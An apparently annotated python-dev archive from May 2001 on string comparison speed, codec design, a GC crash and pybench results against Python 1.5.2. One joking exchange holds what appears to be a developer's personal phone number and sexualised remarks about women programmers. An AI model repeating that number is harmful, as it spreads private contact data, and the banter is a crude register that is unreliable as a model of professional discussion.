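Martin's first set of string_richcompare counts can be cross-checked. The four outcome categories sum exactly to the total number of calls. The ratio of memcmp calls to oldcomp calls, about 70%, is one plausible source of the "first byte decides in 30%" figure: roughly 30% of oldcomp calls are settled before memcmp is reached. That reading is an inference from the numbers, not something stated in the thread:

```python
# Counts from Martin's first instrumented run (test suite).
total = 2378660           # calls to string_richcompare
different_types = 33992   # one operand was not a string
identical = 120517        # same object: outcome known immediately
length_decides = 1775716  # lengths differ, so the EQ answer is known
fell_through = 448435     # richcmp had to call the old compare
oldcomp_calls = 1225643   # all calls to the old compare
memcmp_calls = 860174     # old-compare calls that reached memcmp

# The four categories partition all calls.
assert different_types + identical + length_decides + fell_through == total

def pct(part, whole):
    return 100.0 * part / whole

print(f"identical objects:     {pct(identical, total):.1f}%")
print(f"decided by length:     {pct(length_decides, total):.1f}%")
print(f"needed old compare:    {pct(fell_through, total):.1f}%")
print(f"oldcomp -> memcmp:     {pct(memcmp_calls, oldcomp_calls):.1f}%")
print(f"settled before memcmp: {100 - pct(memcmp_calls, oldcomp_calls):.1f}%")
```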
> To verify this claim, I've counted the cases where the length > decides the outcome, but looking at the first byte also had: > > lens_decide: 1784897 > lens_decide_firstbyte_wouldhave:1671148 > > So in 6% of the cases, checking the length alone gives a decision > which looking at the first byte doesn't; plus it saves a function > call. OTOH, 19% of all richcmp calls ended up calling oldcmp too, so the *net* effect is muddy at best. > To support the thesis that Py_EQ is the common case for strings, I > counted the various operations: > > pyEQ:2271593 > pyLE:9234 > pyGE:0 > pyNE:20470 > pyLT:22765 > pyGT:578 This clearly wasn't doing much sorting of strings (or of tuples containing strings, etc) -- .sort() never uses pyEQ (it only uses pyLT). > Now, that might be flawed since comparing strings for equal is > extremely frequent in the testsuite. To give more credibility to the > data, I also ran setup.py with my instrumented ./python: In the absence of non-trivial use of sorting or the bisect module or one of the search tree modules out there, it's easy to buy that PyEQ is most common for strings. What's not clear is that adding a rich comparison slot actually helps overall (as compared to continuing to let string_compare() handle it, and if the pointer equality test actually saves more than it costs, adding it there instead). It's clearer that this is going to hurt sorting (& bisect etc), by adding yet another layer of function call to get Py_LT resolved (as for dict compares too, the string richcmp can't do anything to speed up Py_LT that string oldcmp can't do just as efficiently -- indeed, that's the great advantage oldcmp's "compare first character" test had: that *can* decide Py_LT in one byte much of the time (but length comparison cannot)). 
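Tim's distinction between what the length test and the first-byte test can decide can be made concrete. Below is a Python sketch of a string comparison using the shortcuts discussed in this thread: identity, then lengths for ==/!=, then the first character for every operator. It models only the decision logic, not the C-level costs being debated. The function name and the returned "how" labels are hypothetical:

```python
import operator

OPS = {"lt": operator.lt, "le": operator.le, "eq": operator.eq,
       "ne": operator.ne, "gt": operator.gt, "ge": operator.ge}

def str_richcompare(a, b, op):
    """Return (result, how) for comparing str a and b with rich op."""
    if a is b:
        # Same object: ==, <= and >= hold; the others do not.
        return op in ("eq", "le", "ge"), "identity"
    if op in ("eq", "ne") and len(a) != len(b):
        # Different lengths settle equality, but never ordering.
        return op == "ne", "length"
    if a and b and a[0] != b[0]:
        # A differing first character settles every operator.
        return OPS[op](a[0], b[0]), "first char"
    return OPS[op](a, b), "full compare"

word = "spam"
print(str_richcompare("spam", "eggs!", "eq"))  # (False, 'length')
print(str_richcompare("spam", "eggs!", "lt"))  # (False, 'first char')
print(str_richcompare("spam", "spat", "lt"))   # (True, 'full compare')
print(str_richcompare(word, word, "ge"))       # (True, 'identity')
```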
Note too the earlier mail about how adding a richcmp slot to strings will suddenly slow cmp(string1, string2) (which is the usual way to program a search tree, because cmp() *used* to call a string comparison routine only once; but after adding a richcmp slot, each cmp(string1, string2) will call the richcmp slot from 1 thru 3 times (data-dependent)). > ... > That shows that optimizing for Py_NE is not worth it. With these data, > I'll upload a patch to SF. Which is here: http://sourceforge.net/tracker/index.php?func=detail&aid=424335&group_id=5470&atid=305470 Heh: let's grab all the ugly URLs off of SourceForge, stick them in a giant list, and sort them. Can't think of a more typical app than that. Thanks for the work, Martin! From tim.one at home.com Wed May 16 10:51:17 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 16 May 2001 04:51:17 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <15105.46090.203278.397835@anthem.wooz.org> Message-ID: [Barry A. Warsaw] > ... > from types import StringType > import time > r = range(1000000) > > def one(r=r): > x = 'hello' > t0 = time.time() > for i in r: Random clue: when you're too lazy to try to subtract out loop overhead (not a knock, I am too), you may have better luck with r = [1] * 1000000 than r = range(1000000) The reason is that the former way gets to keep incref'ing and decref'ing a single object (as it's repeatedly bound to "i" across iterations), instead of slobbering all over memory inc'ing and dec'ing a million distinct objects. there's-as-an-art-to-doing-nothing-quickly-ly y'rs - tim From tim.one at home.com Wed May 16 10:56:56 2001 From: tim.one at home.com (Tim Peters) Date: Wed, 16 May 2001 04:56:56 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <20010515222738.A9996@thyrsus.com> Message-ID: [poor Tim] > In Python terms, those are Pythong lon (unbounded) ints today ^^^^^^^ [Greg Ewing] > What Pythonistas wear on their feet? [Eric S. Raymond] > No, man.
It's what sexy lady Pythonistas wear on the beach in Rio. Eric wins! That's indeed what I was thinking of. I'm surprised nobody asked what a lon was. But not as surprised that I didn't try to blame this on an Outlook 2000 bug. > (Yes, I know some sexy lady Pythonistas. No, you can't have their > phone numbers. Pthfthfthpht...) Too much work anyway. They can have mine: 703 758 8258. but-they-better-*really*-love-python-cuz-i-give-quizzes-ly y'rs - tim From esr at thyrsus.com Wed May 16 11:17:09 2001 From: esr at thyrsus.com (Eric S. Raymond) Date: Wed, 16 May 2001 05:17:09 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: ; from tim.one@home.com on Wed, May 16, 2001 at 04:56:56AM -0400 References: <20010515222738.A9996@thyrsus.com> Message-ID: <20010516051709.C11602@thyrsus.com> Tim Peters : > [poor Tim] > > In Python terms, those are Pythong lon (unbounded) ints today > ^^^^^^^ > [Greg Ewing] > > What Pythonistas wear on their feet? > > [Eric S. Raymond] > > No, man. It's what sexy lady Pythonistas wear on the beach in Rio. > > Eric wins! That's indeed what I was thinking of. I'm surprised nobody asked > what a lon was. But not as surprised that I didn't try to blame this on an > Outlook 2000 bug. > > > (Yes, I know some sexy lady Pythonistas. No, you can't have their > > phone numbers. Pthfthfthpht...) > > Too much work anyway. They can have mine: 703 758 8258. Hmm...now, which one of them should I try to talk into a snakeskin bikini? Duh. Answer obvious: the one I can talk *out* of a snakeskin bikini most rapidly afterwards. Then I'll give her your number -- that is, if I don't get too, er, distracted. seeming-like-a-good-time-to-practice-my-Timlike-wink'ly yours, -- Eric S. Raymond Every Communist must grasp the truth, 'Political power grows out of the barrel of a gun.' -- Mao Tse-tung, 1938, inadvertently endorsing the Second Amendment. From mal at lemburg.com Wed May 16 11:29:49 2001 From: mal at lemburg.com (M.-A.
Lemburg)
Date: Wed, 16 May 2001 11:29:49 +0200
Subject: [Python-Dev] RE: Ill-defined encoding for CP875?
References:
Message-ID: <3B02488D.415BA95F@lemburg.com>

Tim Peters wrote:
>
> [MAL]
> > Round-tripping is obviously very important if you use Unicode
> > as basis for working on text.
>
> Since I use 7-bit ASCII exclusively, I've been using
>
>     encode = decode = lambda x: x
>
> I haven't proved that's round-trippable, but haven't bumped into an exception
> yet.

For character map codecs the complete range(256) of possible input characters should pass the round-trip test, that is

    encoded text -> Unicode -> encoded text

should result in the identity mapping for all c in map(chr,range(256)).

> > I don't know about the reasoning behind making cp875 fail the
> > round-trip -- Unicode certainly provides means to make mappings
> > round-trip safe (e.g. by reverting to the private Unicode
> > char. point areas).
>
> Then I ignorantly but confidently (indeed, with the cheery confidence only
> the truly ignorant can truly enjoy!) vote for your approach that maps the
> non-round-trippable cp875 code points to None. Better safe than sorry, by
> default. Else 6 of the 7 ambiguous chars will be silent surprises by
> default.

I will check in a patch which moves the building logic for encoding maps to codecs.py. This will simplify the task of choosing the "right" solution. Currently I'm in favour of:

def make_encoding_map(decoding_map):

    """ Creates an encoding map from a decoding map.

        If a target mapping in the decoding map occurs multiple
        times, then that target is mapped to None (undefined mapping),
        causing an exception when encountered by the charmap codec
        during translation.

        One example where this happens is cp875.py which decodes
        multiple characters to \u001a.

    """
    m = {}
    for k,v in decoding_map.items():
        if not m.has_key(v):
            m[v] = k
        else:
            m[v] = None
    return m

Perhaps we should also have a codecs.finalize_decoding_map() API in codecs.py which checks the decoding map and postprocesses it in case it finds a problem ?!

--
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting: http://www.egenix.com/
Python Software: http://www.lemburg.com/python/

From mal at lemburg.com Wed May 16 11:32:36 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 11:32:36 +0200
Subject: [Python-Dev] Comparison speed
References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com> <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de>
Message-ID: <3B024934.58232325@lemburg.com>

"Martin v. Loewis" wrote:
>
> > Sounds like we ought to do a search-and-destroy on type comparisons,
> > replacing with isinstance() where possible.
>
> At least in my applications, this is unfortunately not possible: I
> want a test for byte-string-or-unicode-string. This could be done with
> two isinstance calls, but that is certainly less efficient.
>
> Marc-Andre once proposed a type representing the immediate supertype
> of both byte strings and unicode strings; let's call it abstract string.
> Then I could write isinstance(e, types.AbstractString).

I'm still holding on to that idea... hopefully, Guido's type checkins will make this possible in 2.2 or 2.3. The same should then be done for numbers, sequences and mappings (all abstract "types" defined in abstract.c).

--
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting: http://www.egenix.com/
Python Software: http://www.lemburg.com/python/

From mal at lemburg.com Wed May 16 11:34:40 2001
From: mal at lemburg.com (M.-A.
Lemburg) Date: Wed, 16 May 2001 11:34:40 +0200 Subject: [Python-Dev] Comparison speed References: Message-ID: <3B0249B0.5DD10A4C@lemburg.com> Tim Peters wrote: > > [Martin] > > Producing numbers is easy :-) > > If only making sense of them were too <0.6 wink>. FYI, I've added a few compare tests to pybench which now is available as version 0.9. You can download it from my Python page. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mwh at python.net Wed May 16 12:53:16 2001 From: mwh at python.net (Michael Hudson) Date: 16 May 2001 11:53:16 +0100 Subject: [Python-Dev] Easy codec access In-Reply-To: Guido van Rossum's message of "Tue, 15 May 2001 11:35:09 -0500" References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> Message-ID: Guido van Rossum writes: > > I've just checked in a set of patches which implement the new > > .decode() method along with a couple of useful codecs. > > Cool! Indeed. Good idea, Marc! This is a bit unfriendly though: >>> "bobbins".encode("gzip") Traceback (most recent call last): File "", line 1, in ? File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function raise SystemError,\ SystemError: module "encodings.gzip" failed to register I thought SystemErrors shouldn't ever happen (isn't it what gets raised for an illegal opcode, for example?). > > To see just how easy it is to write codecs, please have > > a look at the string codecs I added in this patch (e.g. > > zlib_codec.py or hex_codec.py). I am pretty sure that there > > are a lot more useful things in the standard lib which could > > benefit from these easy-to-use interfaces. > > As an excercise, I added a quoted-printable codec. It was easy > indeed! urlencode would be nice. Maybe re.escape, too. html entities? That's probably a bigger can of worms, but print "
<pre>%s</pre>
"%text.encode("html") seems delightfully simpleminded. Cheers, M. -- GAG: I think this is perfectly normal behaviour for a Vogon. ... VOGON: That is exactly what you always say. GAG: Well, I think that is probably perfectly normal behaviour for a psychiatrist. -- The Hitch-Hikers Guide to the Galaxy, Episode 9 From mal at lemburg.com Wed May 16 13:06:14 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 16 May 2001 13:06:14 +0200 Subject: [Python-Dev] Easy codec access References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> Message-ID: <3B025F26.A625DE02@lemburg.com> Michael Hudson wrote: > > Guido van Rossum writes: > > > > I've just checked in a set of patches which implement the new > > > .decode() method along with a couple of useful codecs. > > > > Cool! > > Indeed. Good idea, Marc! Thanks :-) > This is a bit unfriendly though: > > >>> "bobbins".encode("gzip") > Traceback (most recent call last): > File "", line 1, in ? > File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function > raise SystemError,\ > SystemError: module "encodings.gzip" failed to register > > I thought SystemErrors shouldn't ever happen (isn't it what gets > raised for an illegal opcode, for example?). This is due to the zlib module not being installed. The reason for the search function in encodings/__init__.py raising a SystemError is that it did find a module named gzip, but this module does not export the needed registration API getregentry(). Perhaps it should just raise a LookupError instead, though... > > > To see just how easy it is to write codecs, please have > > > a look at the string codecs I added in this patch (e.g. > > > zlib_codec.py or hex_codec.py). I am pretty sure that there > > > are a lot more useful things in the standard lib which could > > > benefit from these easy-to-use interfaces. > > > > As an excercise, I added a quoted-printable codec. It was easy > > indeed! 
> > urlencode would be nice. Maybe re.escape, too. html entities? > That's probably a bigger can of worms, but > > print "
<pre>%s</pre>
"%text.encode("html") > > seems delightfully simpleminded. Right. That's the idea... volunteers are welcome :-) There are lots of those little "escape this, encode that" tasks which could benefit from the codec machinery. The ones you mention would certainly be good candidates. pickle and marshal would also be a good to have wrapped as codecs. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mwh at python.net Wed May 16 13:19:15 2001 From: mwh at python.net (Michael Hudson) Date: 16 May 2001 12:19:15 +0100 Subject: [Python-Dev] Easy codec access In-Reply-To: "M.-A. Lemburg"'s message of "Wed, 16 May 2001 13:06:14 +0200" References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> <3B025F26.A625DE02@lemburg.com> Message-ID: "M.-A. Lemburg" writes: > > This is a bit unfriendly though: > > > > >>> "bobbins".encode("gzip") > > Traceback (most recent call last): > > File "", line 1, in ? > > File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function > > raise SystemError,\ > > SystemError: module "encodings.gzip" failed to register > > > > I thought SystemErrors shouldn't ever happen (isn't it what gets > > raised for an illegal opcode, for example?). > > This is due to the zlib module not being installed. No it's not, actually. I *thought* I was getting the error message because the zlib encoding doesn't alias itself to gzip (whether it should or not is another question). But in fact if you specify a bogus encoding you get a nice error message: >>> "bobbins".encode("nonesuch") Traceback (most recent call last): File "", line 1, in ? LookupError: unknown encoding but: >>> "bobbins".encode("sys") Traceback (most recent call last): File "", line 1, in ? 
File "/usr/local/src/python/dist/build/Lib/encodings/__init__.py", line 59, in search_function raise SystemError,\ SystemError: module "encodings.sys" failed to register I have to admit I don't really know what's going on here, but the error is just confusing. > The reason for the search function in encodings/__init__.py raising > a SystemError is that it did find a module named gzip, but this > module does not export the needed registration API getregentry(). Yep. > Perhaps it should just raise a LookupError instead, though... Might be easiest. > > urlencode would be nice. Maybe re.escape, too. html entities? > > That's probably a bigger can of worms, but > > > > print "
<pre>%s</pre>
"%text.encode("html") > > > > seems delightfully simpleminded. > > Right. That's the idea... volunteers are welcome :-) Maybe this evening. > There are lots of those little "escape this, encode that" tasks > which could benefit from the codec machinery. The ones you > mention would certainly be good candidates. pickle and marshal > would also be a good to have wrapped as codecs. Ooh yes, hadn't thought of them. 'YW5vdGhlci1mdW4tdG95\n'.decode("base64")-ly y'rs M. -- There's an aura of unholy black magic about CLISP. It works, but I have no idea how it does it. I suspect there's a goat involved somewhere. -- Johann Hibschman, comp.lang.scheme From aahz at rahul.net Wed May 16 15:16:18 2001 From: aahz at rahul.net (Aahz Maruch) Date: Wed, 16 May 2001 06:16:18 -0700 (PDT) Subject: [Python-Dev] Comparison speed In-Reply-To: <20010515222738.A9996@thyrsus.com> from "Eric S. Raymond" at May 15, 2001 10:27:38 PM Message-ID: <20010516131618.C40CC99C91@waltz.rahul.net> Eric S. Raymond wrote: > > (Yes, I know some sexy lady Pythonistas. No, you can't have their > phone numbers. Pthfthfthpht...) That's okay, I have their e-mail addresses. Wanna bet on which of us gets a response first? -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. From barry at digicool.com Wed May 16 15:42:15 2001 From: barry at digicool.com (Barry A. Warsaw) Date: Wed, 16 May 2001 09:42:15 -0400 Subject: [Python-Dev] Comparison speed References: <15105.46090.203278.397835@anthem.wooz.org> Message-ID: <15106.33719.14403.13051@anthem.wooz.org> >>>>> "TP" == Tim Peters writes: TP> Random clue: when you're too lazy to try to subtact out loop TP> overhead (not a knock, I am too), you may have better luck TP> with TP> r = [1] * 1000000 TP> than TP> r = range(1000000) Ah, good point! 
From guido at digicool.com Wed May 16 17:01:40 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 16 May 2001 10:01:40 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Wed, 16 May 2001 09:28:45 +0200." <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de>
References: <200105152059.f4FKxuI03903@mira.informatik.hu-berlin.de> <200105152241.RAA00926@cj20424-a.reston1.va.home.com> <15105.26334.610144.846269@slothrop.digicool.com> <200105160728.f4G7SjK01766@mira.informatik.hu-berlin.de>
Message-ID: <200105161501.KAA02226@cj20424-a.reston1.va.home.com>

> Marc-Andre once proposed a type representing the immediate supertype
> of both byte strings and unicode strings; let's call it abstract string.
> Then I could write isinstance(e, types.AbstractString).

This will probably be doable in 2.2.

--Guido van Rossum (home page: http://www.python.org/~guido/)

From guido at digicool.com Wed May 16 17:24:55 2001
From: guido at digicool.com (Guido van Rossum)
Date: Wed, 16 May 2001 10:24:55 -0500
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Objects tupleobject.c,2.48,2.49
In-Reply-To: Your message of "Tue, 15 May 2001 20:01:05 -0400."
References:
Message-ID: <200105161524.KAA02518@cj20424-a.reston1.va.home.com>

> The question remaining is how much of this list/tuple richcmp behavior is
> guaranteed by the language and how much is just implementation-dependent
> fuzz.

Unclear what you're asking. The language doesn't require any particular semantics for sequence comparisons, but the language of course includes the tuple and list sequence types, and it describes (albeit lacking some rigorous detail) what comparisons for those do. If there are specific lacks of detail, it probably helps to think about filling those in.

> For a more vanilla example, I removed the EQ/NE "lengths differ?"
> tuple richcmp early-exit test because I never found code that made
> it trigger. (but tons of code that gets there without triggering).
> But this has semantic implications too: an implementation without > the early exit may call user-defined comparison routines that raise > exceptions when comparing tuples of different lengths now. Do you > care? (I don't.) I don't care about exceptions either in this case; the shortcut seems fair game. --Guido van Rossum (home page: http://www.python.org/~guido/) From skip at pobox.com Wed May 16 16:28:04 2001 From: skip at pobox.com (skip at pobox.com) Date: Wed, 16 May 2001 09:28:04 -0500 Subject: [Python-Dev] Easy codec access In-Reply-To: <3B025F26.A625DE02@lemburg.com> References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> <3B025F26.A625DE02@lemburg.com> Message-ID: <15106.36468.62292.611515@beluga.mojam.com> mal> pickle and marshal would also be a good to have wrapped as codecs. Why? They operate on much more than strings. -- Skip Montanaro (skip at pobox.com) (847)971-7098 From fredrik at effbot.org Wed May 16 17:07:18 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Wed, 16 May 2001 17:07:18 +0200 Subject: [Python-Dev] Easy codec access References: <3B011CA8.9DDB4FC7@lemburg.com><200105151635.LAA29530@cj20424-a.reston1.va.home.com><3B025F26.A625DE02@lemburg.com> <15106.36468.62292.611515@beluga.mojam.com> Message-ID: <002101c0de19$e7875a90$e46940d5@hagrid> skip wrote: > mal> pickle and marshal would also be a good to have wrapped as codecs. > > Why? They operate on much more than strings. hypergeneralization, of course. 
more candidates: "10".decode("int") "10.0".decode("float") "[1, 2, 3]".decode("list") "readme.txt".decode("file") "SyntaxError".decode("raise") (etc) Cheers /F From nas at python.ca Wed May 16 18:19:42 2001 From: nas at python.ca (Neil Schemenauer) Date: Wed, 16 May 2001 09:19:42 -0700 Subject: [Python-Dev] GC and ExtensionClass In-Reply-To: <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de>; from martin@loewis.home.cs.tu-berlin.de on Mon, May 14, 2001 at 09:40:21PM +0200 References: <200105121916.f4CJGwQ01423@mira.informatik.hu-berlin.de> <200105122108.QAA09951@cj20424-a.reston1.va.home.com> <200105122232.f4CMWAi02765@mira.informatik.hu-berlin.de> <15103.65486.61021.328424@beluga.mojam.com> <200105141940.f4EJeLJ05032@mira.informatik.hu-berlin.de> Message-ID: <20010516091942.A16455@glacier.fnational.com> Martin v. Loewis wrote: > In any case, I think you need to analyse this in a debugger. #7 0x080bc17e in tupletraverse (o=0x8154914, visit=0x807d640 , arg=0x0) at ../Objects/tupleobject.c:366 366 err = visit(x, arg); (gdb) p *o $11 = {ob_refcnt = 1, ob_type = 0x80eb5a0, ob_size = 1, ob_item = {0x402c5180}} (gdb) p *o->ob_item[0] $12 = {ob_refcnt = 2, ob_type = 0x0} In other words the GC is finding a tuple object that contains an element with a funny looking address (data segment?) and an op_type of NULL. 
The collector has started running from here: #10 0x0807debc in collect_generations () at ../Modules/gcmodule.c:467 #11 0x0807dfc4 in _PyGC_Insert (op=0x819f57c) at ../Modules/gcmodule.c:507 #12 0x080af56a in PyDict_New () at ../Objects/dictobject.c:149 #13 0x0808d8b8 in getBaseDictionary (type=0x402bcc40) at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:1249 #14 0x0808eb45 in initializeBaseExtensionClass (self=0x402bcc40) at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:1495 #15 0x08095fb1 in export_subclassed_type (dict=0x81851fc, name=0x402a9388 "GdkDragContext", typ=0x402bcc40, bases=0x816fc34) at /home/skip/src/pygtk2-SNAP-20010408/ExtensionClass.c:3451 #16 0x400194ac in pygobject_register_class (dict=0x81851fc, class_name=0x402a9388 "GdkDragContext", get_type=0x404d5c50 , ec=0x402bcc40, bases=0x816fc34) at gobjectmodule.c:202 #17 0x402a55fd in pygtk_register_classes (d=0x81851fc) at gtk.c:31844 #18 0x40257004 in init_gtk () at gtkmodule.c:98 I don't have time to dig deeper into this right now but perhaps this will help someone. Neil From mal at lemburg.com Wed May 16 18:24:57 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 16 May 2001 18:24:57 +0200 Subject: [Python-Dev] Easy codec access References: <3B011CA8.9DDB4FC7@lemburg.com><200105151635.LAA29530@cj20424-a.reston1.va.home.com><3B025F26.A625DE02@lemburg.com> <15106.36468.62292.611515@beluga.mojam.com> <002101c0de19$e7875a90$e46940d5@hagrid> Message-ID: <3B02A9D9.113836D6@lemburg.com> Fredrik Lundh wrote: > > skip wrote: > > > mal> pickle and marshal would also be a good to have wrapped as codecs. > > > > Why? They operate on much more than strings. Of course. Still their basic task is to take an object and encode in some way for dumps() and do the reverse for loads(). 
That's pretty much what codecs normally do ;-) I wasn't referring to the use of pickle and marshal with string.encode() and .decode(); even though you could then decode a pickle using "pickledata".decode("pickle") and get back the object. These two are very useful though when it comes to using codecs for file wrappers: f = codecs.open('mypicklfile', mode='wb', encoding='pickle') f.write((123, 'abc', 456.789)) f.close() f = codecs.open('mypicklfile', mode='rb', encoding='pickle') t = f.read() f.close() > hypergeneralization, of course. > > more candidates: > > "10".decode("int") > "10.0".decode("float") > "[1, 2, 3]".decode("list") > "readme.txt".decode("file") > "SyntaxError".decode("raise") > (etc) You forgot the most important one ;-) ... "print 'My first Python program'".decode("python").run() -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From skip at pobox.com Wed May 16 19:44:15 2001 From: skip at pobox.com (skip at pobox.com) Date: Wed, 16 May 2001 12:44:15 -0500 Subject: [Python-Dev] Easy codec access In-Reply-To: <3B02A9D9.113836D6@lemburg.com> References: <3B011CA8.9DDB4FC7@lemburg.com> <200105151635.LAA29530@cj20424-a.reston1.va.home.com> <3B025F26.A625DE02@lemburg.com> <15106.36468.62292.611515@beluga.mojam.com> <002101c0de19$e7875a90$e46940d5@hagrid> <3B02A9D9.113836D6@lemburg.com> Message-ID: <15106.48239.813965.579600@beluga.mojam.com> mal> Still their basic task is to take an object and encode in some way mal> for dumps() and do the reverse for loads(). That's pretty much mal> what codecs normally do ;-) Yes, I see that. The conceptual problem I have is that in all previous examples I've seen here they have taken as input and returned as outputs only strings or unicode objects. mal> These two are very useful though when it comes to using codecs mal> for file wrappers: This use I missed. 
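For readers on a modern Python: as far as I know, the string codecs from MAL's checkin (hex, base64, zlib) survive in Python 3 as bytes-to-bytes codecs that are reached through codecs.encode() and codecs.decode() rather than through str.encode(), while no pickle or marshal codec ever entered the standard library. The minimal sketch below assumes Python 3.4 or later. It round-trips a payload through those codecs and shows that asking str.encode() for a non-text codec, or for an unknown name, raises LookupError, which is the exception MAL suggested earlier in this thread in place of SystemError. The helper try_encode is hypothetical, for illustration only.

```python
import codecs

payload = b"another-fun-toy"

# Bytes-to-bytes codecs: "hex", "base64" and "zlib" are standard aliases
# for the hex_codec, base64_codec and zlib_codec modules in encodings/.
for name in ("hex", "base64", "zlib"):
    packed = codecs.encode(payload, name)
    assert codecs.decode(packed, name) == payload  # each one round-trips

print(codecs.encode(payload, "base64"))  # b'YW5vdGhlci1mdW4tdG95\n'


def try_encode(text, encoding):
    """Hypothetical helper: return encoded bytes, or the LookupError text."""
    try:
        return text.encode(encoding)
    except LookupError as exc:
        return "LookupError: %s" % exc


print(try_encode("bobbins", "hex"))       # 'hex' is bytes-to-bytes, not a text encoding
print(try_encode("bobbins", "nonesuch"))  # no codec registered under this name
```

Decoding Michael's signature, codecs.decode(b'YW5vdGhlci1mdW4tdG95\n', 'base64'), gives back b'another-fun-toy' the same way.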
Thanks for the explanation.

Skip

From mal at lemburg.com Wed May 16 20:33:44 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Wed, 16 May 2001 20:33:44 +0200
Subject: [Python-Dev] Performance compares
Message-ID: <3B02C808.E3354D3F@lemburg.com>

After having read a little into the comparison thread, I tried some performance compares on my own: the one between the current CVS version and Python 1.5.2. Both versions were compiled on the same Linux machine, using the same GCC compiler and optimization settings.

Here are the results from pybench 0.9 and pystone; some of the figures show quite dramatic slow-downs. I'm not sure where they result from, but they do concern me a bit, since the upgrade path from 1.5.2 is probably the most common one to be expected in user-land.

Since it is possible that these figures result from my specific machine setup, I'd like to know what other people see on their machines.

Thanks.

--

Python 1.5.2:

Pystone(1.1) time for 10000 passes = 3.26
This machine benchmarks at 3067.48 pystones/second

Python CVS:

Pystone(1.1) time for 10000 passes = 4.43
This machine benchmarks at 2257.34 pystones/second

--

PYBENCH 0.9

Benchmark: /home/lemburg/tmp/pybench-cvs-O.pyb (rounds=10, warp=20)

Tests:                          per run  per oper.   diff *)
------------------------------------------------------------------------
BuiltinFunctionCalls:        1152.60 ms    9.04 us   +64.70%
BuiltinMethodLookup:          903.90 ms    1.72 us
CompareFloats:                908.30 ms    2.02 us   +40.94%
CompareFloatsIntegers:       1276.25 ms    2.84 us   +37.15%
CompareIntegers:             1075.50 ms    1.19 us   +21.09%
CompareLongs:                 989.40 ms    2.20 us   +47.12%
CompareStrings:               844.80 ms    2.25 us   +33.99%
CompareUnicode:              1018.65 ms    2.72 us       n/a
ConcatStrings:               1226.30 ms    8.18 us   +92.56%
ConcatUnicode:               1575.40 ms   10.50 us       n/a
CreateInstances:             2094.05 ms   49.86 us  +101.86%
CreateStringsWithConcat:     1515.75 ms    7.58 us  +111.67%
CreateUnicodeWithConcat:     1833.85 ms    9.17 us       n/a
DictCreation:                2795.30 ms   18.64 us  +203.34%
DictWithFloatKeys:           2285.70 ms    3.81 us   +18.73%
DictWithIntegerKeys:         1444.65 ms    2.41 us   +58.53%
DictWithStringKeys:          1262.60 ms    2.10 us   +52.83%
ForLoops:                     989.95 ms   99.00 us   -10.01%
IfThenElse:                  1232.45 ms    1.83 us   +23.25%
ListSlicing:                  621.40 ms  177.54 us
NestedForLoops:               986.60 ms    2.82 us   +52.09%
NormalClassAttribute:        1231.15 ms    2.05 us   +36.70%
NormalInstanceAttribute:     1114.15 ms    1.86 us   +27.11%
PythonFunctionCalls:         1251.25 ms    7.58 us   +46.09%
PythonMethodCalls:           1034.35 ms   13.79 us   +42.19%
Recursion:                    922.15 ms   73.77 us   +36.76%
SecondImport:                1055.45 ms   42.22 us  +100.47%
SecondPackageImport:         1061.35 ms   42.45 us   +96.31%
SecondSubmoduleImport:       1292.35 ms   51.69 us   +77.89%
SimpleComplexArithmetic:     1748.00 ms    7.95 us  +120.97%
SimpleDictManipulation:      1172.85 ms    3.91 us   +47.85%
SimpleFloatArithmetic:        881.25 ms    1.60 us   +12.30%
SimpleIntFloatArithmetic:     833.80 ms    1.26 us
SimpleIntegerArithmetic:      839.00 ms    1.27 us
SimpleListManipulation:      1252.60 ms    4.64 us   +69.37%
SimpleLongArithmetic:        1360.65 ms    8.25 us  +100.43%
SmallLists:                  2380.05 ms    9.33 us  +116.72%
SmallTuples:                 1793.80 ms    7.47 us  +101.52%
SpecialClassAttribute:       1257.35 ms    2.10 us   +37.91%
SpecialInstanceAttribute:    1340.25 ms    2.23 us   +21.13%
StringMappings:              1601.50 ms   12.71 us       n/a
StringPredicates:            1059.70 ms    3.78 us       n/a
StringSlicing:               1235.90 ms    7.06 us   +98.32%
TryExcept:                   1272.55 ms    0.85 us   +28.39%
TryRaiseExcept:              1383.45 ms   92.23 us   +77.48%
